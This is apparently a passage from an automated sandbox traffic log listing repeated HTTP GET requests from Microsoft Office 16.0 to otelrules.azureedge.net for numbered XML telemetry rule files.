              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
